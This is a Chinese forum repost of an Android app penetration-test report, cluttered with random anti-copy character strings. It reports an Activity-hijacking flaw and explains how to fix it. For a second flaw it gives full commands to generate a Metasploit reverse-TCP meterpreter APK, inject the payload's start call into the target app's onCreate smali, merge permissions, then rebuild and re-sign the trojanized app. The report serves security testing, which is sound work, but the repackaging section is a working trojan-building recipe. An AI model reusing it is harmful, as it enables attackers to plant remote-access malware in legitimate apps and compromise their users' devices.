原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

- C0 c! T8 O" N8 N0 r7 B+ e9 G0 v7 F" |7 K3 q( @
`5 s# s2 j5 o$ C4 i! D- M; p/ y6 Z' ^$ @) D7 [

- m7 M$ N4 q# p9 F9 e7 g! ]8 I) }$ |# f. P- r 文档编号： * N7 f* }& m5 g3 ~' |) `/ \' c ]3 ~9 f1 X- b

' `/ A+ q$ l9 W0 R; h2 s1 j% w( {6 z ' P F6 {6 H2 f" U% z/ c, k ' V2 w2 C7 ?$ J8 B' y $ d) l/ c5 x4 }( J, f

9 N3 o3 y) R& u8 M h1 F* d% ]$ z1 `. X6 j! N # }; K/ m/ a) G ' O* H+ C! Y! w$ P: d# D

3 p4 v0 @9 ]+ E4 x T7 T3 C/ G; w , k3 `) V# x! ~- B , d" A" P1 V& q x) N, t ) W! j- U: x" X- B6 K

3 C6 |+ | y) h6 V& | 7 q9 [: H" P( s7 R/ w 4 R7 |3 I8 T. @! I$ @# {; @3 j# o5 k: O7 A4 s! y

|/ u5 `9 Q+ M8 k( S+ }+ U" }$ `8 E- F* M0 z0 W ) P' o' n7 S% K5 b9 W ' l' N$ d u* u" T2 P; y

+ J8 e5 g, p: K: H % A9 R. f0 e: E7 \- u a6 b 某某某APP渗透测试 ! w4 V/ r l. F; O3 S) K* X9 O- X7 Q4 B6 l/ S6 S- R0 }+ k

0 q1 x7 q+ x( S* ?* P, j f. }: W" y( V+ W/ |$ W 5 O" g& r1 H! W: }8 `5 v1 z) z8 q, f6 H * U- M( c" U* T- h3 J$ B4 K

* v. i8 m( Y+ w& A) c9 n; h2 t7 \ - \8 K1 E! {( X) n/ g2 T7 D - B9 K D2 |, _4 p$ E % ?- v: \- R, w: e0 L1 Q* ~" M3 W9 M

, C0 U! E; c- k( }" P- D- r7 V 6 @* M; |9 d- R% u1 B- [3 l. t: D . F7 b2 N4 s9 O4 z' p9 s- G H - T: |8 E" t' _

. [' N f. q3 ?3 @0 z5 N( y1 t: N2 e . E p5 |- N4 U# U6 ~ ) a8 e0 ?% ]3 K" ]' ~ ; v2 Z* q8 U8 ?) {

* ~6 @3 o; v5 |3 i 5 g4 J$ j& @! O! q; w 技术报告 ; P$ e+ C3 _& ]7 d: e, e# `6 q% u 3 @1 o, y! y) V* z7 x- b6 r7 t6 S

% g& w+ p1 g$ G1 C# S9 ]$ b! c6 [" @4 W8 l( f* c, F ( `/ O6 S$ |7 v- {/ E2 u ! x9 ]; z5 _! C% `, F

x( w& h/ n. |5 _4 L" Q2 I ) z2 {$ [6 p/ |- [6 L: l- S5 L7 F $ A% ?/ u( L" j% g$ ^# D * e. A7 |1 t& M& c) v! [$ `

& t5 ^% n2 B6 y# J! }* J - C( U4 U/ W7 D" D8 O. F/ I) @ ! e# L, @2 Q; {8 a( `' f F 7 p* h' K. l, n, F* W9 a

( J# }+ ~4 g: ^/ {% x # o! _ t+ Y! c2 D0 { * r9 w# r) c0 h7 y/ `' y/ y9 f1 ~5 z5 x" G

# F1 W$ A5 m) b 0 P& U8 P: }/ g- T$ {0 ^& h 6 f! ]; s2 X, N8 @ a3 l3 ?$ p- h3 V& Z: B; u |

! p, c5 o @+ {" W( ~ 9 k* _8 v9 z& ^2 b% |" b - d1 a: U0 H' e, |5 b( ^, v+ U# X' b" C E5 Q

* s; w4 Y( u: W! O* Z6 h$ K' d. F$ o! i, ?- M; ] c. y3 h % z. a+ a; l4 y$ |; f! E + ^% i' p; O" @5 W' s' u) K8 l

$ l7 q: f- t! z- k. @: ]$ w' N/ }5 n& B3 G( J$ s 2 u3 o0 @% i- c. C 4 A' ?, i& p. l; {+ F! e

7 q5 K0 ^% p Y% y ( Q% }, N& g$ U. H4 q$ p4 M ( ~: Q" }9 T+ `' v , Z1 q' C6 f- e% {

/ e) J; m6 {) p, ^ & v9 b5 U) Y) b4 F : K. Y) n7 K2 ]. E/ j. @ " n0 N) J8 j- K7 D

# ~+ a0 c3 F V$ N4 V: E! a% Q, i1 l0 B1 x. |- R, a$ P 8 V9 x5 y3 W" @! D. r$ o7 `; M5 S 8 K. J8 G" W! ^

0 |: W9 q. @# l w6 k% }9 l" C 8 d1 ] J6 Z& z) x' @! V # a& s) w& C9 N0 \& E. z: u) T $ |' f+ A; K2 F- ]0 n' P

7 S. W; A. c2 u# ?# n: O+ C H9 T- E8 @$ |/ S & r# n+ d* a d3 t 6 u# I) n* {7 g& l# x9 ^

8 X, v. s/ u( i8 [ $ u4 G7 K) Z9 f+ ~( R. v4 g 6 f& v: [% T- O; I2 n- H+ O, t- Q/ {- j , {% \) e* N7 s! ?2 ~

0 u% N# B8 M O6 \/ r' x. G 5 C$ x0 |1 t" b4 T 4 [1 Q! a. f! F Y8 x/ A 6 q [- w* J! A! {. U$ K. g

5 c" a0 I6 e s% j9 D8 J5 ~# K 9 g4 t' g* m) c) V' V5 x! n + d. d( ]7 ~6 i+ g; n( ]2 u ! z c1 }# c: y: S

- P7 Y" H1 U# D8 S4 A5 X7 Y) X m7 Y, d1 Z, |: c2 u e ( H( a5 N' O: n : q9 ?/ p! K! f+ {& J) b

( c! Z( T* ?: Y% v. z: [3 m9 R ' h3 _4 L% j* O- o. L9 ~1 ~4 x 0 w, G- H/ s& c v% |. {, ]" |: A

2 F0 O7 S7 C# R, f s8 Y& }& O $ B% f) W3 b# n5 W) S 二〇二〇年 Y$ L9 t( D! A+ @* R7 O: T: L/ `. {" p

6 C. w3 q: N0 \: q 5 x7 [+ S& _, ~2 g* K 目录 8 f3 H% E2 v# n3 j8 m9 A 5 p0 l: P; U5 W# I5 b6 |) f

8 _- F8 a, e, d2 @7 W: y d5 j1 y' ~2 ^ , F8 Z2 R2 g! M % R0 E5 Y( [) U$ e }

4 l2 h, [, A! Y$ J- G# \# |, A; f6 s3 K7 z0 X 1 概述... 3 9 Z0 A$ u$ ^7 s- W 4 C. B# S) a1 ~4 k8 y6 E

2 x$ m; f7 O1 b' ? - f) I( s6 z0 J, H1 L9 k0 q+ {4 Z 1.2测试时间... 3 : d2 d. ?* l4 V M0 \7 o; q; I 8 H( v0 {9 _- W; M

4 k+ V% M q( B9 c% H/ Z, r, ^) z1 D# H( S 1.3测试对象... 3 & N& x" [# I0 Y5 q ( J, h2 |+ U8 x9 ~5 P

5 m9 \9 u* H0 A7 Z - S3 h9 Y" J0 X. g: r# D3 ~0 a 1.4测试结果... 3 / b" t* a8 q: ^7 ~7 f7 c# }/ L1 N3 c3 ^: |$ H2 b4 r9 P$ d. F

9 }2 F% y; g4 g" F0 S! G8 b" l4 {5 J, a4 r _; F" k6 M 2 检测结果... 4 ! w" f2 i; {$ h* T' _5 L9 q # M5 p. ?* \6 j' f

8 S# W8 P$ s( c& D1 q : p& b" ?) v7 g7 d& E5 ^ 2.1 某某某... 4 9 l% _+ q) ~$ Z# u% F " _- m2 ?+ G+ i4 r- L/ a+ {/ |4 T

% T7 T% F; ?+ c. E 5 U: x& N& c6 d 2.1.1检测目标... 4 * d5 h4 s/ p5 k! }) v/ G% U2 p/ c* \

, ]$ t! K C Q) ` s% e+ X( P1 h ]2 C, \ 2.1.2检测结果... 4 ; J; o7 {% Y/ j5 Q & e3 K0 V# S) O0 I- _

1 X" I% [( N& a) E1 W7 s* W, O$ K' f% g ! L _& t8 e6 Y! S/ a( G# L 2.1.2.1. 4 , m4 b5 {! H* e2 i 9 N# k6 ^7 d/ c) W5 D& s: w

7 u s* I- F! Q- c8 B( G9 W# O 7 a7 q: C T( ^8 I 2.1.2.2. 6 3 U A$ m) p3 [ % S1 N" @1 J' y

6 m1 H) \' o# r3 O& O" g) F4 Z B1 `5 `1 }. I" i 1 _4 k# Q1 Z" A8 z* A- j0 w / y' U3 `. U9 L4 ^! Q# Q: D! E9 b1 o

" k H1 w, c2 d# }* Q4 _ 5 y* N" E. E/ `: }" s0 L 1 概述 ) h% y6 h/ K9 I" Q& C5 I8 [& y% |! g7 o# F: c- |6 O0 h

8 R% ~, V. W k% S% b# ?/ S, i. U" u h2 d9 c V: `9 V: j& g0 l 1.2测试时间 % U' K4 I. d& v. ?. o( Q2 x 5 s; Z" c: Q0 q) h j- G

; I1 e$ Q0 G! R. _ # P2 H' Y& t2 }, i % C. ?* ]4 I: g" w+ N8 K- m 0 u! N4 }" i1 t0 r# b# S# [8 z 渗透测试时间 8 e6 ]. E) A8 ~5 t; x5 P - a# v0 \ a- B. ?& V2 A8 Q* ^ 3 B3 P3 d- W" l M7 M , u0 l/ T: K6 S/ C, ]8 R
) J! y7 ?3 a4 V$ i9 Z7 d- \: e+ Q- o* F9 e' } , _+ \' B, V0 u, t, d7 V* T& S/ p$ Q e/ \/ r1 Z. u% [# w- z 起始时间 9 V2 R" S9 B" A$ k/ k$ e7 d% d9 }, L+ y. l % w; z- \6 B/ Y * }( b( t$ [! h4 Z* y+ s	- c- P1 _/ S; Q4 Z ! Y' L& v% j4 d' E/ c & x/ N% l* {4 ?6 ]4 U q 0 K% h( l% X/ O& M# J2 ^: m3 X 2020年4月6日 " ^) m* X; T3 n+ }' m' Y# E # U% W: m6 J I/ q& J6 b6 h . W4 N. L6 q: L& B 4 k3 p, r1 r: n) ]1 d
: H( _1 Y$ \|4 e3 B 7 e) B5 u$ x* F0 T" s% V # ]- h+ C% d* I5 n( U$ e z 4 w. z! l3 @2 J0 y- W ` 结束时间 6 i, d+ ~5 m+ `2 _9 Y( H4 P& ?4 ~" y8 z$ @) w& i/ K2 W ) g( p6 H7 S: N$ @( F( x0 y1 u0 E( t# S 8 L& I8 B6 \|# ~' S+ U9 B+ B2 y	) k# R" T# \|* q- f/ z . O4 x( R5 Y- W2 k - h7 A$ u# Z3 c 5 E7 d$ _6 n0 ] M 2020年4月9日 & H4 P8 j1 ~' a7 [: N7 D6 Y' D . b' C7 V+ _( D # i$ g& R$ `3 P, q4 {7 t0 r$ m3 X& p: I' n" [0 g7 f" n

; z; p! w7 e& x* G e7 i, U5 \ & S- ?# r3 J6 G3 t$ M7 B7 ? 1.3测试对象 " s$ g: S& V: c5 q" H7 S! v" {9 z , ]( U- c0 U+ Z2 p) m

9 i c1 b: V5 X& E9 V& c$ K / v# _# X3 L& y. I: w 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 5 i H& w. r! O7 f $ V6 f+ Z4 N( p& n0 s

( I/ l& K& Y' {( F + y$ c8 X! D; W2 Q, G7 N 表1-1 检测对象 }8 L0 ^) Q1 T& }4 G3 S7 H; ?' w% `- a * e4 ]3 i5 Q5 [7 ?

# L x2 `6 K) S5 R : x& m. \' _ b t % L/ j8 E: G' v/ B 6 u! g5 x2 U- V) _$ g 序号 & n( E, v7 C0 D9 j" \|6 \|. u, E; A( X; O" }8 r ) ^1 L: Z$ e0 _7 i, w/ n% ^& b. ?	, n( U( V/ R- [% \|' j6 E' L2 k , Y$ b7 S( O* {9 X' r# s" E + ]0 F/ \|6 Z. r2 r - N/ \|, ^+ B. t" \|% G9 `6 t 测试对象 " @' b, \|, G0 i3 [( \|- p: s" y. L6 y- g f6 y0 `6 c# q / ^$ ^5 l! p( N; K) S$ K; C, Z1 I% T3 u: b	S# o$ g, o' T5 H q% n ! B( S n4 n: U6 s# i7 s* W 7 F- ^$ o4 }) ~2 N/ l( T3 Z 0 s- F( [) g/ b6 Z2 X0 p 测试地址 7 K) c, G/ W/ E; Z! E) X# g / z# Z; E1 e3 X/ A$ W + L2 f# `) z! A/ @* V! v9 @3 t- N! V7 P" _	8 S4 e, q" C: d( k7 g: `8 C1 v. \ % M! p8 C! `8 C! M$ S D; n% C L, c " O0 p5 l* o0 O) T# } X- @) p1 {( F7 F 安全漏洞 ; r3 U1 D; c3 S" o / h( M3 W' v2 P$ y: O( i3 V8 w " F, a' z+ @2 h1 Q% O5 ] s; R0 K M5 Q) E. E5 j: t4 W
8 t4 `& { \|: D/ g& T9 `1 h. d& M& P7 }6 t; l! l / U3 p. j/ z3 e: r! R7 P3 G 2 f$ l. A/ d) P2 m0 ^ 1 4 }1 ~! \6 i3 l4 n6 k- y- A' \|0 k5 ^, ~+ _ ( k# Z8 `( C' U n' t 4 J, a* \|! k8 \	: u5 I G% {6 n# Y) u; c1 N& t$ o/ \ # {- b4 g& H3 o% N( {: T/ H2 m " u' k0 q! w6 ?) b5 f( C4 Z 某某某安卓APP 6 m! l' t' a1 l A * `$ o* s% S0 d7 L( A 5 N5 K7 E2 n. I+ } ( n6 o' f, G( e, g	" I' Z' V1 }- ?& I! e$ a ( C1 Q+ _) w+ o; A+ N1 H ( ]( b- M4 a. {5 j7 g ! {! d4 T9 }+ c7 F 7 }. {6 J7 X" B+ Y1 Z8 U6 U5 C / L; R. @0 G+ Y9 v+ V ( p8 P5 d3 ]$ ~, v8 M1 I/ \| ' J# a: s; K' j7 t7 v	6 M# M: z, x7 K# h# z1 O( Z ' x6 r8 P+ h1 v1 }: e) I# _9 ~8 d; U) f + u1 y% k. {* G q! [4 X6 Z 4 F* D+ y7 l- N# G4 Z8 y 2 & o! A# D9 s' U* n* t3 E 0 ?8 O1 e5 E; I$ z% W ; ^" ^2 j( T: I2 c U2 x% u* S* [2 } % h8 v1 `5 b* L9 N

; j) h& P! B$ L+ }1 ]; e$ r( H ) |6 Z6 d/ u9 w! _1 Q8 `, r 1.4测试结果 2 B" o( ^, ~0 a. u% Z ) i! h% t, O; A" m* A# K8 D3 f

& U# l7 e: R. a+ ~3 M4 Y 5 g8 ?) Q# ?2 j) A `1 f 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： . i8 I$ L: Z; ?; U * H$ [+ B0 l8 Q& ?' {! I3 Z

4 _3 n0 M( v' b' K. U / I9 x E: h# i* a# \& G& p t5 K 8 ^! Z/ L. ?: F+ g9 c. L" h" z3 S3 Q, H! q7 _

; X1 P6 {% ^/ X- a) C# |; b2 o R" K" C+ a. ?) v2 @) M 序号 2 }9 N7 N, S* s( E4 k3 F) l, s) U4 c1 u/ Q. ~) I% V( c6 ^

: A3 ]* [0 [3 v/ e: e" o9 D6 P6 C 5 t9 Z: A& M" i. a% G4 I 系统名称 % _+ G- N0 ^9 J: W9 B+ V : P4 e z6 O: T$ n

& I- M4 p" e8 @! A+ ^+ i & G1 q: B( }# ^, s 漏洞名称 & `1 v: }& U5 f2 o Q7 C# E- E5 T ! y3 b" N" R" Y. Y3 Y9 ?6 n( N

! N/ P& E8 |, g$ h3 x6 X- V : ^ e2 L t p7 H9 s. ]& S 漏洞危害 # D% [. x% j8 z* | w9 \ * K7 Z2 K! N1 o0 X$ N9 O

C" ~4 Q6 O4 e, t4 q1 s2 l. | : W7 O& q8 w$ N3 U' l) d 修复结果 2 F: Q W5 e* B% X 9 L) o: G: g3 f! r6 B7 c6 R

; M) y' ]9 w4 \0 H# Q / T% C0 \+ [& \- t) O; I' Q 1 $ |! } d. G! S0 I' b- p9 g- Q7 p9 d' U3 m

j5 w2 m* g! K% p2 ]8 w! A% |3 M0 c# T* R9 \9 ? 某某某某某某APP # d7 f- Y8 m6 t# c$ w7 `" h ! y6 f/ W- T- _8 W- y

5 x2 `* g7 V; y/ Z 9 h$ H: X+ k* O) q% ~ Activity 劫持 ( |# a9 E+ r# n 9 p, F+ b& y* a& ^

+ [" z/ Q5 D7 \. R8 x0 L) l8 L ) ^- |9 b; H# C/ g4 S$ T Y4 e1 _/ Y p+ ` 7 b9 w! v4 \0 `7 A: p6 t

5 ]' U0 o9 j. F+ j 3 ~0 {$ E# f. l. v' z' D 高 ) [! S" }1 w6 w: j 0 S9 s: D9 x/ {8 w% P

3 ?! A; f* B* B% i) P# l $ v- E" k5 w0 U. S( i3 W9 ~ 1 w& u! y w5 }7 B0 S ( ~' r4 Q0 W9 ~/ o- h. V* h

P: r/ P# q. j, p1 |" F, M$ [6 m( s - q( U8 g& s$ u) e6 G 2 " z$ w7 ?- }( V% ^, X % {! f% n- ~7 ]2 Z5 \' C, c

) U8 f( ?7 `, w' W, R1 m: J5 v: H$ X6 Y4 A 某某某某某某APP ; p, B+ X1 T" {1 i7 s) {; l- H * O) X$ j/ q% a; q; U

' s# h4 C* r! V& _" ]/ \ * u: k! _( }. K9 } 反编译二次打包捆绑木马、篡改APP代码 8 y1 \' Y, \( U/ q. b8 g4 s( i# H# a# P# l& C

6 |5 q, r* s0 J* [) v r' q5 P' \/ B! Z, A3 ]9 b' S6 t* @6 j 高 / S7 o0 s. g, J( V9 i! H6 V : p. }9 N p9 _

# ^) ?5 Y' i! K2 U- r $ y# p, U9 m" B9 E 2 |* V* p# w. [: K' e% ~( F$ V% p) ^ M

8 {& T; i j- E* G* E7 {7 M/ d) w2 f/ v* z / i! I8 R3 @+ @6 m# j( A! h& Y/ S. y3 \8 i5 J

% @4 j0 t, @7 s* R' X4 m $ { v0 S9 d& _, C1 C 表1-2 测试结果 * w' c0 q) q& X- m& R9 U# ~ }* S, M. n! t3 w# ]# f

5 |3 Y+ Q* Q( w , Q; f2 N5 s3 h - M8 q6 w5 L9 Z) Z s2 H( n- p. ~" i U

5 E& t. ~4 w n5 h# ~2 y, `, G. t % o/ g+ x( i7 R- I% }2 L; x 2 检测结果 L, i3 k: K/ y# D3 ]1 J2 {& A6 h* S" w: ]( D

7 ]: A( q" B* M2 n# V 2 ~" l" z2 V) A5 g4 v 2.1 某某某 $ J2 M A. j) g# \+ n* B / @ F6 i1 v5 K: u7 l& V

" _% j$ B' Q4 g, H) A: F9 q: l% ^5 K% b& s6 O5 N7 _2 X 2.1.1检测目标 # x6 r" Y* {- i- [ / `" k4 M# A1 a9 m3 C6 Y

$ K+ A& Y9 s0 w) G6 w% Y' A# L" }8 d) @: f 目标地址： 某某某某某某APP o/ b: q4 V: s " }5 z% T2 m6 \$ I3 { a

3 j% x% m d. F |, y1 b5 @: l' y! i+ v, k) X' l, C 2.1.2检测结果 - N- P. Z2 p8 W: F/ N4 ` E/ S& R5 R3 [7 S0 X2 ]- d; g% ?

Y( N: m" Z& [7 ?1 r8 |# ?2 x) t. A: V" U- D4 }4 u 2.1.2.1 3 W6 P+ g y: Q. o" W" x2 H; l Q! f' q/ p4 _

) s+ M, Y, q; O1 a c! A! \ % w& y' ~) m) ]% i' S 漏洞链接地址：某某某某某某APP 3 T; p0 G. y7 \. T ! o6 t% H' e; i) X2 X

( Q& i' U- }) s/ m( z / s) I, f3 _& u) k2 v2 O 3 T. k" c% L' _. c1 q ) S0 W+ K( F2 P: X+ q6 h- s0 M: r

y% G7 M: p% r8 W( Z( C2 G / }) t- A& Y! T/ e3 X3 i 漏洞分析及取证： 3 {6 P5 X% m, j m 0 z. q" n' p( o$ e% F& A6 R: i

+ p% A& ^, p9 S8 j0 J3 C. F1 Y9 f. d2 m7 ^0 m x8 L 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： H' f2 z& Y/ v+ `4 X2 D [0 \; D; s

) ]( C* R# \& C0 Q% M4 D2 f) m! J & w$ V" B' |, M8 N& m 6 V0 b# U( N6 G: Q# k( v, j* D; g2 @ 7 C* q5 g$ [0 _0 A& q+ ~

* @; ]# X6 n# f, e' @1 _/ w$ j7 H8 L - X& N# }0 f! ~$ `1 Z & s# S4 [- w' N! U. A4 T" F! Q3 C 8 F- W* q7 [- U i; y+ @

" K4 Q0 j* O+ Q2 b- Z- n% L 5 e; K4 b- |9 d8 k: X! @6 F" B 2 Y# |1 e k. Z5 k4 _4 Z4 |/ b . o6 d5 |; P0 `1 q

. e# u" V- R4 D) `9 I" h% }8 F9 U8 e D A, T$ s4 F1 j- D 3 T( v2 n6 t1 K! I! y; m- S3 m- A1 ^4 x

0 {" E; Z- f0 C$ [# m, k2 ]' T" Q: m : x' M7 i) Z1 u1 l+ p2 V- G+ Y. Z* f# s4 i $ R/ J b e: I. C: s8 E& p $ j, a& e) p" _* ~% e8 w- N' _9 u

8 R: D1 e( E2 z* V6 h5 f5 Y8 {; d7 C! s 漏洞危害：高 3 E1 \% s) y! u& u0 k/ K2 ] 8 I3 e0 b+ L' c) ^3 \

5 i$ G! o9 P4 @# u" p" ] : ?; ^, V& C4 q6 ]9 \, _; m, n - ?- r0 x1 s) L( f; d9 W$ g1 e' G& a% h( _6 A! u 严重程度 . r5 v5 y' }$ V& l @0 x , o& Q- q" h/ U4 P, W + Y& m# L* y# e d$ x 1 M( q4 w" f, M	6 C( \|1 i1 V# L3 `4 H5 T) y0 t- {' s. T' x! B+ _ 9 J) `7 ~8 M5 C9 T0 e$ } 3 h S7 \|+ G' Q: b( Y) Y0 ^, A- j9 D 高 4 M0 V" z4 u: A1 P' N 4 n' \|4 K3 ?/ ^; v% n# P+ Y4 ^6 X 0 a& y8 f; n$ M4 @# j* y1 T: a2 ?0 y, {	. } c* o9 M5 {% c5 E6 L0 w : _5 X# u1 e y$ H+ m4 ^! _5 g - _ v) Y, D* a1 {- P/ z6 s W. \+ Z4 f ■ 7 V D; E; ^) j- ~# W' p+ Y# p8 z/ M* _8 v6 n+ [+ X$ v . u, e6 }' X$ j2 J% T# } ' a* [9 ]9 H% ^6 G& P) M. x3 i2 q	- v, @, U1 ?; z A . H. {$ K& E+ p, `" J / m; { z. H% O: L$ E3 N4 Y0 Y$ k. q& e( P; b 中 . G c' f9 o9 G2 h, { 9 x3 C4 ~$ m1 U1 i: c* V 8 l' H ^9 @; o) H& {5 v$ l; U6 {" h1 J	3 r" I* g6 L. Z: U* N; Q ' `! S# ~. O d# w, s( A& Y ; P5 p; W* \# \* i 4 p- F+ b4 T' \6 E# J 5 }: p. g9 P5 V7 V+ C( _+ \|1 U$ {+ \| 3 _4 U6 M: H" f / L- \' g& p: o7 B) `	8 e- c, i! g, l2 @9 D 0 _% q$ Q( q! ?$ c6 Z8 u, Q4 L1 U5 Q 7 Z2 x$ v& U \5 o ' Z: e* P7 v! `4 [% P 低 3 g/ B* m' _0 \+ t2 _0 O& }4 @# G5 ^2 s1 H, V8 `0 {6 \| ' m% q* _9 }! s1 Q / N7 K% e) j$ [% T	$ g: b* e: g) {. T) ~4 \|2 p% ^/ j' G9 e$ \ ) g4 m/ }3 J+ A0 q* `: _: U) F; f8 \1 R& c/ o0 U * j" G. U0 R: D' J: s% A , S. J( ~# K+ N/ Y+ G 9 p. B8 u0 }: t1 q/ o( Y7 [ 6 q8 b" V: C) s, `9 y3 `6 @

* w. @; ~; t" C- `9 b9 \4 C% i/ x1 o" s) m6 }8 I& v ) ]4 G* J- G1 D- g 3 e' { G2 q: c. C$ Q

* {1 r- \0 d- |5 l* G2 v2 Z6 a ! C: L* K( z: q6 r+ E 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 ! N& O/ r" J* }/ X! S$ e( J A {6 U$ _7 g* c. r* p

2 r1 [6 I2 I2 _" b% h 7 L) ]+ k* i6 E1 f Y8 e # V6 p6 x: y( Y+ v! `2 Z/ d6 t2 m4 s, T

4 R& F/ U; B8 ?2 t5 K # V* Z8 C8 I: ?5 w, Y# j ; _$ J: r* a: ]' t1 ?4 d2 H ' W6 h5 `5 m, A) M3 X5 v. e0 F

% i% U* M( t+ C0 S 2 G V3 m5 K# ] 2.1.2.2 . W: x, _' c# P; S9 v) t 8 t! {; c; b! h; T

+ p& J S3 C7 F. D3 k; G# |8 V; E+ \6 s ~; b4 R' x/ j* I 漏洞链接地址：某某某某某某APP - m3 i8 c# D; |( U" B9 D/ B $ s" W8 V. R) r8 p

% t0 h6 d8 U# K; y 4 R( i, ^: i, \ y8 N+ z/ ]) b 漏洞分析及取证： + Q: p5 E; s& S, a3 Q* a 9 r1 |& b' j& i. q

( e0 `4 N% f/ L5 q) o# H7 q2 W: {0 Q4 b0 q! F 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： * W& ?) @; x8 M! t8 ^ : }/ W' V4 K4 S: j! R

1 |" w* Q+ q4 a# }( b0 E/ [ : t# B4 y. E0 \+ @( u3 Z6 g" l 用Metasploit 生成木马 apk & k* R6 [( E8 M) f& V 4 j( A' ]( T0 ~- v

s0 w" _( d& X: u4 y, l* U1 f # L& x2 R* N* G2 p+ u. f3 L( ^% } msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk D! W$ L6 d6 O* @+ Z 5 y; |, Z# V* d) F( m! I

) \; A. M! I& C5 u4 t2 W' O) M' N8 u- E j( K 反编译目标apk和木马apk 2 J! F" ]- |4 k( R3 I1 m$ v P ( U, z) i2 V: V3 _; G1 o0 b+ b* m1 f( p

S! ^& `/ ?. J4 Z# L5 Q( }) b2 \ , y5 [( U1 K" F* t apktool d target.apk
, j/ k" g4 o4 J" N0 m4 {- i: ^7 W+ W / T2 ?% X' I5 c: d# c D6 x apktool d cockhorse.apk % @0 X7 P0 y5 y3 M5 ^ x , U/ `, G! Y7 m4 D, p4 p1 a" h

( V; |3 O% H7 Z# U$ j" d $ F/ d" U. o9 i _1 y6 V" V. f 木马 apk 注入目标 apk * J- q& n% h" ? _. v 2 J2 N5 z1 r% D, U# R* k) U/ }

+ }8 a9 u# h" D+ q ' t7 r! A2 \3 x# z 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
3 N% {% ?: \, R4 V1 b ! Q8 a* ?4 G. G! o: X" T/ Y$ [% l; D invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ' U# i6 o( [' I" {4 W2 z: j % }" X( x, f, x

8 y. i+ ]5 t# ^0 A) U( }: M, V1 D7 u, F! y! o/ f. D; I6 W! X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 {+ T3 s! A* Q- C" R% a' v* G 8 e8 E1 J; r, L8 z ]

3 L/ r2 f; E) M1 i+ b 1 ]3 M2 I- G( O# J1 P, \. g! N1 l 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 / F. D7 }& m3 s0 E& _/ @/ u 8 S4 V2 f# @" t, K

) ]: C" E$ ^# P6 O % @6 n/ ~+ C# m5 x$ J6 E& I 回编译生成最终 apk l+ M. a) n2 e' ^2 Z w0 @; m4 B3 ^& e- o1 U: U

2 Y' Q$ b; c( K9 A9 |! ] 6 X1 W/ h( {; G- Y 重新打包 " t) _, K- g. J8 E5 q! h# y9 e: h ; X# c. E. S4 w ]- z

6 t) H3 j' L. d# j7 h% I ( v7 [2 N4 J% h apktool b -o repackage.apk target_app_floder ' k) A& Z' H- ?( V! }& M) g; [2 g& h ( k' L0 l6 J7 D1 m# e0 a

+ y. c; b8 w% }1 ~$ Y : I" m8 v, F# F 创建签名文件，有的话可忽略此步骤 8 n8 N s$ V! c: F% I) \0 M1 ? 0 w9 [* W% V: ]5 G: M3 r% g

- o: u7 n% v2 I. F ' `: }) d/ j6 K. F keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 + J, E/ @7 P. U" H ; t4 q; `; N7 q% P; k' p1 {, d

P. ?8 v* i- Y9 f 0 \; P/ {' m$ |+ J3 t 签名，以下任选其一 9 Y O3 v: l2 H3 a. s4 n J! z R$ e4 o* W) X: H/ I

& Z& o; G m- B6 A% ]! L* P3 G & V5 x; m0 t* e: l0 [ jarsigner 方式 5 c4 t. j/ A* }- z% F( j" M ' [% b# N1 e$ H) _) i8 a, @

5 H4 f1 V% @) s C+ S& Q * u) N$ q8 [1 n) P2 [% p) L" R jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' u0 X( H. z" `' v. [ 4 J7 r& ]: \) y

+ p3 v' P0 |1 P( N* ]6 P% `. s; e6 G+ x, w! U/ M apksigner 方式 " k* M2 d( V$ E! s, H+ Y4 M2 U" D 5 @3 l' H! ]4 ^6 T% x( I

1 @0 e& x$ A- ^$ b4 P2 s 1 h/ c6 T# w1 ^- a" u1 P apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk $ o4 N8 J$ D7 x( s: _1 Y ; K0 H( V( I* K8 |! [3 x

y. ~% {" c( ^3 W0 {5 |7 g 4 W# i" O: ~+ r! x- D 如需要禁用 v2签名 添加选项--v2-signing-enabled false ' T" ^; d' C7 l- W1 T: `: F V+ g4 E1 ]. C- {

7 c. j, J& U- R9 q% D# S3 D5 O1 \8 A$ @ 验证，以下任选其一 2 k7 P& [, i2 _ 8 k1 k5 I Y* ~' |

# \+ d6 w, P! \7 b6 E0 N 2 h- j$ r0 \% v9 k jarsigner方式 5 u; N: S/ |- l9 U9 f 4 ^7 k6 Y+ t3 M( ~6 _+ q

5 d, y; t( I: I. J3 P& N$ E1 s. V/ _. B r: x4 k) J$ e jarsigner -verify repackaged.apk " z7 Y: p9 L6 X. e# e/ ^0 t# ?1 x! s

" C8 |9 R( w6 Z" [1 ^& n * l" f2 S$ M/ U2 l apksigner 方式 1 p5 T; G! s+ o( h1 Z; H( B4 r. K0 y7 w' j% ~! I' _0 H% m3 {

' L, |; W% W. w! K' A& b1 c1 N/ ~! t* E ' E. V5 T8 l5 V& d: ^& h apksigner verify -v --print-certs repackaged.apk # O4 A5 o) G B) w2 D8 l- ^8 b% {! O! T0 N : O2 i: `* Z( g5 x) B6 N

